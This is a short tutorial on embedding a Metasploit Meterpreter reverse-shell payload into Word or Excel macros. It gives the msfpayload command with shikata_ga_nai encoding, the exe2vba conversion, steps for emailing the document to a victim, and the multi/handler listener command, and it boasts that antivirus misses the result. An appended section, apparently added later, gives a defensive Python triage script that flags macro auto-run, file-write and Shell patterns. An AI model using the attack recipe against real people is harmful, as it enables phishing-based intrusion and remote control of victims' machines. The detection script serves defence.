
Metasploit - VBScript Infection Method

Metasploit has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful for client-side attacks and can also be useful if you have to bypass some sort of filtering that blocks executables and only permits documents to pass through. To begin, we first need to create our VBScript payload.

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe

Then, we need to convert our executable to VBScript using the "exe2vba.rb" script in the tools section:

ruby exe2vba.rb payload.exe payload.vbs

Now, copy payload.vbs to a Windows machine that has Microsoft Word or Excel installed. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor. If you're using Word/Excel 2007, go to View Macros, then enter a name like "dgodam" for your macro and select "create".

This will open the Visual Basic Editor. Paste the output of the first portion of the payload script into the editor and save it.

Paste the remainder of the script into the Word document itself. This is when you would perform the client-side attack by emailing this Word document to someone.

Before we send off our malicious document to our victim, we first need to set up our Metasploit listener:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=8080 E

Our listener is now waiting on port 8080 for a reverse connection from our victim.

We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn't get picked up by anti-virus!!!
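
From the defender's side, the document built above has two parts that a mail gateway or analyst can inspect: macro code saved in the Visual Basic Editor and payload data pasted into the document body. The following triage sketch is an added example, not code from the original post or from Metasploit. It works on macro source and body text that have already been extracted from the file, and its indicator patterns, the 200-character threshold and the sample strings are assumptions.

```python
import re

# Indicator patterns are illustrative assumptions (traits common to dropper
# macros), not a transcript of what exe2vba.rb actually emits.
INDICATORS = {
    "auto_run": re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    "file_write": re.compile(r"\bOpen\b.+\bFor\s+(Binary|Output)\b", re.I),
    "execute": re.compile(r"\bShell(Execute)?\b", re.I),
    "reads_body": re.compile(r"\bActiveDocument\.(Paragraphs|Content|Range)\b", re.I),
}
LONG_TOKEN = re.compile(r"\S{200,}")  # assumed size of an encoded blob in the body
CHAIN = {"auto_run", "file_write", "execute"}


def strip_comments(src):
    """Drop VBA ' comments so keywords inside them do not trigger a finding."""
    lines = []
    for line in src.splitlines():
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:i]
                break
        lines.append(line)
    return "\n".join(lines)


def triage(macro_source, body_text):
    """Return (verdict, findings) for one document's macro code and body text."""
    code = strip_comments(macro_source)
    findings = [name for name, rx in INDICATORS.items() if rx.search(code)]
    if LONG_TOKEN.search(body_text):
        findings.append("encoded_body")
    if CHAIN <= set(findings):
        body_evidence = {"reads_body", "encoded_body"} & set(findings)
        verdict = "dropper_with_embedded_payload" if body_evidence else "dropper_chain"
    else:
        verdict = "review" if findings else "clean"
    return verdict, findings


# Constructed samples: a harmless macro, and a non-functional skeleton with the traits above.
BENIGN = ("Sub FormatReport()\n  ' Shell is only named in this comment\n"
          "  Selection.Font.Bold = True\nEnd Sub\n", "Quarterly report. " * 20)
SUSPECT = ('Sub AutoOpen()\n  n = ActiveDocument.Paragraphs.Count\n'
           '  Open "<path>" For Binary As #1\n  Shell "<path>"\nEnd Sub\n',
           "Invoice attached.\n" + "0a1b2c3d" * 100)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage(*sample))
```

A verdict of "review" means only part of the auto-run, file-write and execute chain was seen, so the document needs a human look rather than an automatic block.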


Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!
